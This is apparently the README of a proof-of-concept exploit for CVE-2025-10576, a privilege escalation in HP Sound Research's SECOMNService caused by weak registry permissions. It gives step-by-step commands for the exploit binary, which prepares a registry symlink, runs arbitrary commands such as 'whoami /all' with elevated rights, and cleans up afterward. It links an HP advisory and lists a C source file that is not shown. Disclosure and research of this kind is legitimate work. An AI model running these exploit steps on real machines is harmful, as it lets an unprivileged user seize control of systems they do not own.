HP Sound Research SECOMNService Escalation of Privilege# CVE-2025-10576
HP Sound Research SECOMNService Escalation of Privilege. Weak registry permissions allows any user to create a registry symlink and force the SECOMNService service to create an arbitrary registry key.
**How to:**
1. soundresearch_poc.exe prepare
2. Restart SECOMNService or the machine
3. soundresearch_poc.exe exploit "whoami /all > C:\Windows\soundresearch.txt"
4. soundresearch_poc.exe exploit "*another command*"
5. soundresearch_poc.exe cleanup
Reference: https://support.hp.com/us-en/document/ish_13092608-13092602-16/hpsbhf04051
[4.0K] /data/pocs/45fc8e7ce9b555353a680fe63c1e0ce752337efd
├── [ 571] README.md
└── [3.9K] soundresearch_poc.c
1 directory, 2 files